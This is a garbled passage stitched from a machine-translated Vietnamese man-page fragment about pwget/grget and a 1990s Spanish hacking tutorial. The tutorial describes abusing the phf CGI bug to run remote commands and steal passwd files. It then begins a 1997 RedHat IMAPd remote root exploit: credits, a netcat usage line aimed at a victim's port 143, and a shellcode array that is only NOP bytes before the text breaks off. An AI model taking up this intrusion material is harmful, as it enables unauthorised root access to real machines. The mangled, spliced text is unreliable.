được sử dụng để truy cập thông tin tìm thấy trong B / etc / passwd và BR / etc / nhóm Những thói quen này cung cấp một phương pháp truy cập phổ biến cho dù sử dụng cơ sở dữ liệu mạng Vàng hoặc không. Các đầu ra của những thói quen được gửi đến đầu ra tiêu chuẩn. Không có lựa chọn, tôi pwget và đầu ra tôi grget tất cả các dữ liệu được tìm thấy. | 25 etc. como veis la sintaxis es sencilla y mas comodo que usar el navegador. Para posteriores ediciones del texto comentare algun codigo interesante que tengo para explotar el phf asi como algun truquillo para obtener mas posibilidades de este bug. o como pillar los ficheros de passwd si esta shadow evitar filtrado de ip etc. pensad que una maquina con phf es una maquina en la que puedes ejecutar y ver comandos remotamente. asi que pensando un poco las posibilidades son infinitas o XPLOITS QUE TE DAN DIRECTAMENTE UNA SHELL En este apartado voy a poner unos cuantos xploits pero como he dicho anteriormente la red esta llena de xploits para todos los sistemas operativos y casi todas las versiones asi que aqui solo voy a poner unos cuantos. En fin voy a poner uno que da directamente un shell de root debido al bug del impad puerto 143 en maquinas linux con RedHat IMAPd Linux intel remote xploit by savage@ 1997-April-05 Workz fine against RedHat and imapd distributed with pine Special THANKS to b0fh r00t eepr0m moxx Fr4wd Kore and the rest of ToXyn usage imap 0 cat nc victim 143 -- usually from -1000 to 1000 try in steps of 100 I try 0 100 and 200 - so1o include char shell x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 x90 .